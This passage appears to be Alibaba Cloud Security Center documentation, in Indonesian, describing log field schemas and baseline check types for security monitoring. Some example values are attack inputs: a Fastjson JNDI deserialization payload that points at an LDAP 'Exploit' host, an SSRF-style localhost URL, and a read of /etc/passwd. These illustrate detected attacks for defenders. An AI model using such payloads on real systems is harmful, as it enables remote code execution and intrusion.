instance_type | Tipe instans. Nilai: ECS (Elastic Compute Service); SLB (Server Load Balancer); RDS (ApsaraDB RDS); MONGODB (ApsaraDB for MongoDB); KVSTORE (ApsaraDB for Redis); ACR (Container Registry); CSK; VPC (Virtual Private Cloud); ACTIONTRAIL (ActionTrail); CDN (Content Delivery Network); CAS (Certificate Management Service); RDC (Apsara DevOps); RAM (Resource Access Management); DDoS (Anti-DDoS); WAF (Web Application Firewall); OSS (Object Storage Service); PolarDB (PolarDB); POSTGRESQL (ApsaraDB RDS for PostgreSQL); MSE (Microservices Engine); NAS (File Storage NAS); SDDP (Sensitive Data Discovery and Protection); EIP (Elastic IP Address). | ECS |
region_id | ID wilayah tempat instans berada. | cn-hangzhou |
requirement_id | ID persyaratan. Anda dapat memperoleh ID ini dengan memanggil operasi | 5 |
risk_level | Tingkat risiko. Nilai: | MEDIUM |
section_id | ID bagian. Anda dapat memperoleh ID ini dengan memanggil operasi | 1 |
standard_id | ID standar. Anda dapat memperoleh ID ini dengan memanggil operasi | 1 |
status | Status item pemeriksaan. Nilai: | PASS |
vendor | Penyedia layanan cloud. Nilai tetap: | ALIYUN |
start_time | Timestamp mulai, dalam detik. Juga digunakan untuk menunjukkan waktu kejadian. | 1719472214 |
Log pertahanan jaringan
Bidang | Deskripsi | Contoh |
cmd | Command line proses yang diserang. | nginx: master process nginx |
cur_time | Waktu terjadinya event serangan. | 2023-09-14 09:21:59 |
decode_payload | Payload yang dikonversi dari HEX ke karakter. | POST /Services/FileService/UserFiles/ |
dst_ip | Alamat IP aset yang diserang. | 172.16.XX.XX |
dst_port | Port aset yang diserang. | 80 |
func | Tipe event yang dicegat. Nilai: | payload |
rule_type | Tipe aturan spesifik dari event yang dicegat. Nilai: | alinet_payload |
instance_id | ID instans aset yang diserang. | i-2zeg4zldn8zypsfg**** |
internet_ip | Alamat IP publik aset yang diserang. | 39.104.XX.XX |
intranet_ip | Alamat IP pribadi aset yang diserang. | 192.168.XX.XX |
final_action | Tindakan pertahanan. Nilai tetap: | block |
payload | Payload dalam format HEX. | 504f5354202f20485454502f312e310d0a436f6e74656e742d547970653a20746578742f706c61696e0d0a557365722d4167656e743a20**** |
pid | ID proses yang diserang. | 7107 |
platform | Tipe sistem aset yang diserang. Nilai: | linux |
proc_path | Path proses yang diserang. | /usr/sbin/nginx |
sas_group_name | Grup aset server di Security Center. | default |
src_ip | Alamat IP sumber serangan. | 106.11.XX.XX |
src_port | Port sumber serangan. | 29575 |
uuid | UUID server. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | Timestamp mulai, dalam detik. Juga digunakan untuk menunjukkan waktu kejadian. | 1719472214 |
Log perlindungan aplikasi
Bidang | Deskripsi | Contoh |
app_dir | Direktori tempat aplikasi berada. | /usr/local/aegis/rasp/apps/1111 |
app_id | ID aplikasi. | 6492a391fc9b4e2aad94**** |
app_name | Nama aplikasi. | test |
confidence_level | Tingkat kepercayaan algoritma deteksi. Nilai: | low |
request_body | Badan permintaan. | {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://172.220.XX.XX:1389/Exploit","autoCommit":true} |
request_content_length | Panjang badan permintaan. | 112 |
data | Parameter titik hook. | {"cmd":"bash -c kill -0 -- -'31098' "} |
headers | Header permintaan. | {"content-length":"112","referer":"http://120.26.XX.XX:8080/demo/Serial",...} |
hostname | Nama host atau perangkat jaringan. | testhostname |
host_ip | Alamat IP pribadi host. | 172.16.XX.XX |
is_cliped | Menunjukkan apakah log terpotong karena melebihi batas panjang. Nilai: | false |
jdk_version | Versi JDK. | 1.8.0_292 |
message | Deskripsi peringatan. | Unsafe class serial. |
request_method | Metode permintaan HTTP. | Post |
platform | Tipe sistem operasi. | Linux |
arch | Arsitektur sistem operasi. | amd64 |
kernel_version | Versi kernel sistem operasi. | 3.10.0-1160.59.1.el7.x86_64 |
param | Parameter permintaan. Format umum meliputi parameter GET dan application/x-www-form-urlencoded. | {"url":["http://127.0.0.1.xip.io"]} |
payload | Payload serangan efektif. | bash -c kill -0 -- -'31098' |
payload_length | Panjang payload serangan. | 27 |
rasp_id | ID unik probe RASP. | fa00223c8420e256c0c98ca0bd0d**** |
rasp_version | Versi probe RASP. | 0.8.5 |
src_ip | Alamat IP peminta. | 172.0.XX.XX |
final_action | Hasil penanganan peringatan. Nilai: | block |
rule_action | Metode penanganan peringatan yang ditentukan oleh aturan. Nilai: | block |
risk_level | Tingkat risiko. Nilai: | high |
stacktrace | Jejak stack. | [java.io.FileInputStream.<init>(FileInputStream.java:123), ...] |
time | Waktu pemicuan peringatan. | 2023-10-09 15:19:15 |
timestamp | Timestamp saat peringatan dipicu, dalam milidetik. | 1696835955070 |
type | Tipe serangan. Nilai: | rce |
url | URL permintaan. | http://127.0.0.1:999/xxx |
rasp_attack_uuid | UUID event serangan. | 18823b23-7ad4-47c0-b5ac-e5f036a2**** |
uuid | UUID host. | 23f7ca61-e271-4a8e-bf5f-165596a16**** |
internet_ip | Alamat IP publik host. | 1.2.XX.XX |
intranet_ip | Alamat IP pribadi host. | 172.16.XX.XX |
sas_group_name | Nama grup server Security Center. | Group 1 |
instance_id | ID instans host. | i-wz995eivg28f1m** |
start_time | Timestamp mulai, dalam detik. Juga digunakan untuk menunjukkan waktu kejadian. | 1719472214 |
Log deteksi file berbahaya
Bidang | Deskripsi | Contoh |
bucket_name | Nama bucket OSS. | ***-test |
event_id | ID peringatan. | 802210 |
event_name | Nama peringatan. | Program penambangan |
md5 | Hash MD5 file. | 6bc2bc******53d409b1 |
sha256 | Hash SHA256 file. | f038f9525******7772981e87f85 |
result | Hasil deteksi. Nilai: | 0 |
file_path | Path file. | test.zip/bin_test |
etag | Identifier file OSS. | 6BC2B******853D409B1 |
risk_level | Tingkat risiko. Nilai: | remind |
source | Skenario deteksi. Nilai: | OSS |
parent_md5 | Hash MD5 file induk atau file arsip. | 3d0f8045bb9****** |
parent_sha256 | Hash SHA256 file induk atau file arsip. | 69b643d6******a3fb859fa |
parent_file_path | Nama file induk atau file arsip. | test.zip |
start_time | Timestamp mulai, dalam detik. Juga digunakan untuk menunjukkan waktu kejadian. | 1719472214 |
compress_file_number | Nomor urut subfile dalam arsip, dalam format [saat ini]/[total]. Misalnya, 1/10 berarti ini adalah file ke-1 dari 10 dalam arsip. | 1/10 |
Log event pemantauan file inti
Bidang | Deskripsi | Contoh |
start_time | Waktu kejadian terbaru, dalam detik. | 1718678414 |
uuid | UUID klien. | 5d83b26b-b**a-4**a-9267-12**** |
file_path | Path file. | /etc/passwd |
proc_path | Path proses. | /usr/bin/bash |
rule_id | ID aturan yang cocok. | 123 |
rule_name | Nama aturan. | file_test_rule |
cmdline | Command line. | bash /opt/a |
operation | Operasi yang dilakukan pada file. | READ |
risk_level | Tingkat peringatan. | 2 |
pid | ID proses. | 45324 |
proc_permission | Izin proses. | rwxrwxrwx |
instance_id | ID instans. | i-wz995eivg2**** |
internet_ip | Alamat IP publik. | 192.0.2.1 |
intranet_ip | Alamat IP pribadi. | 172.16.0.1 |
instance_name | Nama instans. | aegis-test |
platform | Tipe sistem operasi. | Linux |
Log deteksi tanpa agen
Bidang umum
Bidang | Deskripsi | Contoh |
uuid | UUID server. | ad66133a-dc82-4e5e-9659-a49e3**** |
instance_id | ID instans. | i-2zeg4zldn8zypsfg**** |
internet_ip | Alamat IP publik aset. | 39.104.XX.XX |
intranet_ip | Alamat IP pribadi aset. | 192.168.XX.XX |
sas_group_name | Grup aset server di Security Center. | default |
start_time | Timestamp mulai, dalam detik. Juga digunakan untuk menunjukkan waktu kejadian. | 1719472214 |
Bidang risiko kerentanan
Bidang | Deskripsi | Contoh |
vul_name | Nama kerentanan. | imgsca:java:gson:AVD-2022-25647 |
vul_alias_name | Alias kerentanan. | kerentanan isu kode gson (CVE-2022-25647) |
vul_primary_id | ID kunci utama kerentanan. | 990174361 |
type | Tipe kerentanan. Nilai: | sca |
alert_level | Tingkat risiko kerentanan. Nilai: | asap |
instance_name | Hostname. | hhht-linux-*** |
operation | Tindakan yang dilakukan terhadap kerentanan. Nilai: | new |
status | Status kerentanan. Nilai: | 1 |
tag | Tag kerentanan. Nilai: | oval |
Bidang pemeriksaan baseline
Bidang | Deskripsi | Contoh |
check_item_name | Nama item pemeriksaan. | Atur waktu kedaluwarsa kata sandi |
check_item_level | Tingkat risiko item pemeriksaan. Nilai: | high |
check_type | Tipe item pemeriksaan. | Otentikasi identitas |
risk_level | Tingkat risiko. Nilai: | low |
operation | Tindakan. Nilai: | new |
risk_name | Nama item risiko. | Pemeriksaan kepatuhan kebijakan kata sandi |
status | Status item pemeriksaan. Nilai: | 1 |
sub_type_alias_name | Alias subtipe. | Standar Alibaba Cloud - Baseline keamanan CentOS Linux 7/8 |
sub_type_name | Nama subtipe baseline. Untuk nilai valid, lihat Daftar tipe dan subtipe baseline. | hc_centos7 |
type_name | Nama tipe baseline. | hc_best_secruity |
type_alias_name | Alias tipe. | Praktik keamanan terbaik |
container_id | ID kontainer. | b564567427272d46f9b1cc4ade06a85fdf55075c06fdb870818d5925fa86**** |
container_name | Nama kontainer. | k8s_gamify-answer-bol_gamify-answer-bol-5-6876d5dc78-vf6rb_study-gamify-answer-bol_483a1ed1-28b7-11eb-bc35-00163e01****_0 |
Bidang sampel berbahaya
Bidang | Deskripsi | Contoh |
alert_level | Tingkat risiko. Nilai: | suspicious |
alert_name | Nama peringatan sampel berbahaya. | Proses Mencurigakan-Berbasis SSH |
operation | Tindakan. Nilai: | new |
status | Status risiko sampel berbahaya. Nilai: | 0 |
suspicious_event_id | ID event peringatan. | 909361 |
Bidang file sensitif
Bidang | Deskripsi | Contoh |
alert_level | Tingkat risiko. Nilai: | high |
rule_name | Nama tipe file. | Token Ionic |
file_path | Path file sensitif. | /Windows/Microsoft.NET/assembly/GAC_MSIL/System.WorkflowServices/v4.0_4.0.0.0__31bf3856ad36****/System.WorkflowServices.dll |
result | Hasil pemeriksaan. | {"result":"[\"[\\\"mysql-uqjtwadmin-xxx"} |
Lampiran
Daftar tipe dan subtipe baseline
Type Name | Nama Subtipe | Deskripsi |
hc_exploit | hc_exploit_redis | Eksploitasi ancaman berisiko tinggi: Akses tidak sah ke Redis |
hc_exploit_activemq | Eksploitasi ancaman berisiko tinggi: Akses tidak sah ke ActiveMQ | |
hc_exploit_couchdb | Eksploitasi ancaman berisiko tinggi: Akses tidak sah ke CouchDB | |
hc_exploit_docker | Eksploitasi ancaman berisiko tinggi: Akses tidak sah ke Docker | |
hc_exploit_es | Eksploitasi ancaman berisiko tinggi: Akses tidak sah ke Elasticsearch | |
hc_exploit_hadoop | Eksploitasi ancaman berisiko tinggi: Akses tidak sah ke Hadoop | |
hc_exploit_jboss | Eksploitasi ancaman berisiko tinggi: Akses tidak sah ke JBoss | |
hc_exploit_jenkins | Eksploitasi ancaman berisiko tinggi: Akses tidak sah ke Jenkins | |
hc_exploit_k8s_api | Eksploitasi ancaman berisiko tinggi: Akses tidak sah ke server API Kubernetes | |
hc_exploit_ldap | Eksploitasi ancaman berisiko tinggi: Akses tidak sah ke LDAP (Windows) | |
hc_exploit_ldap_linux | Eksploitasi ancaman berisiko tinggi: Akses tidak sah ke OpenLDAP (Linux) | |
hc_exploit_memcache | Eksploitasi ancaman berisiko tinggi: Akses tidak sah ke Memcached | |
hc_exploit_mongo | Eksploitasi ancaman berisiko tinggi: Akses tidak sah ke MongoDB | |
hc_exploit_pgsql | Eksploitasi ancaman berisiko tinggi: Baseline akses tidak sah ke PostgreSQL | |
hc_exploit_rabbitmq | Eksploitasi ancaman berisiko tinggi: Akses tidak sah ke RabbitMQ | |
hc_exploit_rsync | Eksploitasi ancaman berisiko tinggi: Akses tidak sah ke rsync | |
hc_exploit_tomcat | Eksploitasi ancaman berisiko tinggi: Kerentanan inklusi file Apache Tomcat AJP | |
hc_exploit_zookeeper | Eksploitasi ancaman berisiko tinggi: Akses tidak sah ke ZooKeeper | |
hc_container | hc_docker | Standar Alibaba Cloud: Pemeriksaan baseline keamanan Docker |
hc_middleware_ack_master | Praktik keamanan terbaik internasional: Pemeriksaan baseline keamanan node master Kubernetes (ACK) | |
hc_middleware_ack_node | Praktik keamanan terbaik internasional: Pemeriksaan baseline keamanan node Kubernetes (ACK) | |
hc_middleware_k8s | Standar Alibaba Cloud: Pemeriksaan baseline keamanan master Kubernetes | |
hc_middleware_k8s_node | Standar Alibaba Cloud: Pemeriksaan baseline keamanan node Kubernetes | |
cis | hc_suse 15_djbh | MLPS Level 3: Pemeriksaan baseline kepatuhan SUSE 15 |
hc_aliyun_linux3_djbh_l3 | MLPS Level 3: Pemeriksaan baseline kepatuhan Alibaba Cloud Linux 3 | |
hc_aliyun_linux_djbh_l3 | MLPS Level 3: Pemeriksaan baseline kepatuhan Alibaba Cloud Linux/Aliyun Linux 2 | |
hc_bind_djbh | MLPS Level 3: Pemeriksaan baseline kepatuhan Bind | |
hc_centos 6_djbh_l3 | MLPS Level 3: Pemeriksaan baseline kepatuhan CentOS Linux 6 | |
hc_centos 7_djbh_l3 | MLPS Level 3: Pemeriksaan baseline kepatuhan CentOS Linux 7 | |
hc_centos 8_djbh_l3 | MLPS Level 3: Pemeriksaan baseline kepatuhan CentOS Linux 8 | |
hc_debian_djbh_l3 | MLPS Level 3: Pemeriksaan baseline kepatuhan Debian Linux 8/9/10 | |
hc_iis_djbh | MLPS Level 3: Pemeriksaan baseline kepatuhan IIS | |
hc_informix_djbh | MLPS Level 3: Pemeriksaan baseline kepatuhan Informix | |
hc_jboss_djbh | MLPS Level 3: Pemeriksaan baseline kepatuhan JBoss | |
hc_mongo_djbh | MLPS Level 3: Pemeriksaan baseline kepatuhan MongoDB | |
hc_mssql_djbh | MLPS Level 3: Pemeriksaan baseline kepatuhan SQL Server | |
hc_mysql_djbh | MLPS Level 3: Pemeriksaan baseline kepatuhan MySQL | |
hc_nginx_djbh | MLPS Level 3: Pemeriksaan baseline kepatuhan Nginx | |
hc_oracle_djbh | MLPS Level 3: Pemeriksaan baseline kepatuhan Oracle | |
hc_pgsql_djbh | MLPS Level 3: Pemeriksaan baseline kepatuhan PostgreSQL | |
hc_redhat 6_djbh_l3 | MLPS Level 3: Pemeriksaan baseline kepatuhan Red Hat Linux 6 | |
hc_redhat_djbh_l3 | MLPS Level 3: Pemeriksaan baseline kepatuhan Red Hat Linux 7 | |
hc_redis_djbh | MLPS Level 3: Pemeriksaan baseline kepatuhan Redis | |
hc_suse 10_djbh_l3 | MLPS Level 3: Pemeriksaan baseline kepatuhan SUSE 10 | |
hc_suse 12_djbh_l3 | MLPS Level 3: Pemeriksaan baseline kepatuhan SUSE 12 | |
hc_suse_djbh_l3 | MLPS Level 3: Pemeriksaan baseline kepatuhan SUSE 11 | |
hc_ubuntu 14_djbh_l3 | MLPS Level 3: Pemeriksaan baseline kepatuhan Ubuntu 14 | |
hc_ubuntu_djbh_l3 | MLPS Level 3: Pemeriksaan baseline kepatuhan Ubuntu 16/18/20 | |
hc_was_djbh | MLPS Level 3: Pemeriksaan baseline kepatuhan WebSphere Application Server | |
hc_weblogic_djbh | MLPS Level 3: Pemeriksaan baseline kepatuhan WebLogic | |
hc_win 2008_djbh_l3 | MLPS Level 3: Pemeriksaan baseline kepatuhan Windows 2008 R2 | |
hc_win 2012_djbh_l3 | MLPS Level 3: Pemeriksaan baseline kepatuhan Windows 2012 R2 | |
hc_win 2016_djbh_l3 | MLPS Level 3: Pemeriksaan baseline kepatuhan Windows 2016/2019 | |
hc_aliyun_linux_djbh_l2 | MLPS Level 2: Pemeriksaan baseline kepatuhan Alibaba Cloud Linux/Aliyun Linux 2 | |
hc_centos 6_djbh_l2 | MLPS Level 2: Pemeriksaan baseline kepatuhan CentOS Linux 6 | |
hc_centos 7_djbh_l2 | MLPS Level 2: Pemeriksaan baseline kepatuhan CentOS Linux 7 | |
hc_debian_djbh_l2 | MLPS Level 2: Pemeriksaan baseline kepatuhan Debian Linux 8 | |
hc_redhat 7_djbh_l2 | MLPS Level 2: Pemeriksaan baseline kepatuhan Red Hat Linux 7 | |
hc_ubuntu_djbh_l2 | MLPS Level 2: Pemeriksaan baseline kepatuhan Ubuntu 16/18 | |
hc_win 2008_djbh_l2 | MLPS Level 2: Pemeriksaan baseline kepatuhan Windows 2008 R2 | |
hc_win 2012_djbh_l2 | MLPS Level 2: Pemeriksaan baseline kepatuhan Windows 2012 R2 | |
hc_win 2016_djbh_l2 | MLPS Level 2: Pemeriksaan baseline kepatuhan Windows 2016/2019 | |
hc_aliyun_linux_cis | Praktik keamanan terbaik internasional: Pemeriksaan baseline keamanan Alibaba Cloud Linux/Aliyun Linux 2 | |
hc_centos 6_cis_rules | Praktik keamanan terbaik internasional: Pemeriksaan baseline keamanan CentOS Linux 6 | |
hc_centos 7_cis_rules | Praktik keamanan terbaik internasional: Pemeriksaan baseline keamanan CentOS Linux 7 | |
hc_centos 8_cis_rules | Praktik keamanan terbaik internasional: Pemeriksaan baseline keamanan CentOS Linux 8 | |
hc_debian 8_cis_rules | Praktik keamanan terbaik internasional: Pemeriksaan baseline keamanan Debian Linux 8 | |
hc_ubuntu 14_cis_rules | Praktik keamanan terbaik internasional: Pemeriksaan baseline keamanan Ubuntu 14 | |
hc_ubuntu 16_cis_rules | Praktik keamanan terbaik internasional: Pemeriksaan baseline keamanan Ubuntu 16/18/20 | |
hc_win 2008_cis_rules | Praktik keamanan terbaik internasional: Pemeriksaan baseline keamanan Windows Server 2008 R2 | |
hc_win 2012_cis_rules | Praktik keamanan terbaik internasional: Pemeriksaan baseline keamanan Windows Server 2012 R2 | |
hc_win 2016_cis_rules | Praktik keamanan terbaik internasional: Pemeriksaan baseline keamanan Windows Server 2016/2019 | |
hc_kylin_djbh_l3 | MLPS Level 3: Pemeriksaan baseline kepatuhan Kylin | |
hc_uos_djbh_l3 | MLPS Level 3: Pemeriksaan baseline kepatuhan UOS | |
hc_best_security | hc_aliyun_linux | Standar Alibaba Cloud: Pemeriksaan baseline keamanan Alibaba Cloud Linux/Aliyun Linux 2 |
hc_centos 6 | Standar Alibaba Cloud: Pemeriksaan baseline keamanan CentOS Linux 6 | |
hc_centos 7 | Standar Alibaba Cloud: Pemeriksaan baseline keamanan CentOS Linux 7/8 | |
hc_debian | Standar Alibaba Cloud: Pemeriksaan baseline keamanan Debian Linux 8/9/10 | |
hc_redhat 6 | Standar Alibaba Cloud: Pemeriksaan baseline keamanan Red Hat Linux 6 | |
hc_redhat 7 | Standar Alibaba Cloud: Pemeriksaan baseline keamanan Red Hat Linux 7/8 | |
hc_ubuntu | Standar Alibaba Cloud: Pemeriksaan baseline keamanan Ubuntu | |
hc_windows_2008 | Standar Alibaba Cloud: Pemeriksaan baseline keamanan Windows 2008 R2 | |
hc_windows_2012 | Standar Alibaba Cloud: Pemeriksaan baseline keamanan Windows 2012 R2 | |
hc_windows_2016 | Standar Alibaba Cloud: Pemeriksaan baseline keamanan Windows 2016/2019 | |
hc_db_mssql | Standar Alibaba Cloud: Pemeriksaan baseline keamanan SQL Server | |
hc_memcached_ali | Standar Alibaba Cloud: Pemeriksaan baseline keamanan Memcached | |
hc_mongodb | Standar Alibaba Cloud: Pemeriksaan baseline keamanan MongoDB 3.x | |
hc_mysql_ali | Standar Alibaba Cloud: Pemeriksaan baseline keamanan MySQL | |
hc_oracle | Standar Alibaba Cloud: Pemeriksaan baseline keamanan Oracle 11g | |
hc_pgsql_ali | Standar Alibaba Cloud: Pemeriksaan baseline keamanan PostgreSQL | |
hc_redis_ali | Standar Alibaba Cloud: Pemeriksaan baseline keamanan Redis | |
hc_apache | Standar Alibaba Cloud: Pemeriksaan baseline keamanan Apache | |
hc_iis_8 | Standar Alibaba Cloud: Pemeriksaan baseline keamanan IIS 8 | |
hc_nginx_linux | Standar Alibaba Cloud: Pemeriksaan baseline keamanan Nginx | |
hc_suse 15 | Standar Alibaba Cloud: Pemeriksaan baseline keamanan SUSE Linux 15 | |
tomcat 7 | Standar Alibaba Cloud: Pemeriksaan baseline keamanan Apache Tomcat | |
weak_password | hc_mongodb_pwd | Kata sandi lemah: Deteksi kata sandi lemah login MongoDB (versi 2.x) |
hc_weakpwd_ftp_linux | Kata sandi lemah: Pemeriksaan kata sandi lemah login FTP | |
hc_weakpwd_linux_sys | Kata sandi lemah: Pemeriksaan kata sandi lemah login sistem Linux | |
hc_weakpwd_mongodb 3 | Kata sandi lemah: Deteksi kata sandi lemah login MongoDB | |
hc_weakpwd_mssql | Kata sandi lemah: Pemeriksaan kata sandi lemah login database SQL Server | |
hc_weakpwd_mysql_linux | Kata sandi lemah: Pemeriksaan kata sandi lemah login database MySQL | |
hc_weakpwd_mysql_win | Kata sandi lemah: Pemeriksaan kata sandi lemah login database MySQL (Windows) | |
hc_weakpwd_openldap | Kata sandi lemah: Pemeriksaan kata sandi lemah login OpenLDAP | |
hc_weakpwd_oracle | Kata sandi lemah: Deteksi kata sandi lemah login Oracle | |
hc_weakpwd_pgsql | Kata sandi lemah: Pemeriksaan kata sandi lemah login database PostgreSQL | |
hc_weakpwd_pptp | Kata sandi lemah: Pemeriksaan kata sandi lemah layanan pptpd | |
hc_weakpwd_redis_linux | Kata sandi lemah: Pemeriksaan kata sandi lemah login database Redis | |
hc_weakpwd_rsync | Kata sandi lemah: Pemeriksaan kata sandi lemah layanan rsync | |
hc_weakpwd_svn | Kata sandi lemah: Pemeriksaan kata sandi lemah layanan SVN | |
hc_weakpwd_tomcat_linux | Kata sandi lemah: Pemeriksaan kata sandi lemah konsol Apache Tomcat | |
hc_weakpwd_vnc | Kata sandi lemah: Pemeriksaan kata sandi lemah VNC Server | |
hc_weakpwd_weblogic | Kata sandi lemah: Deteksi kata sandi lemah login WebLogic 12c | |
hc_weakpwd_win_sys | Kata sandi lemah: Pemeriksaan kata sandi lemah login sistem Windows |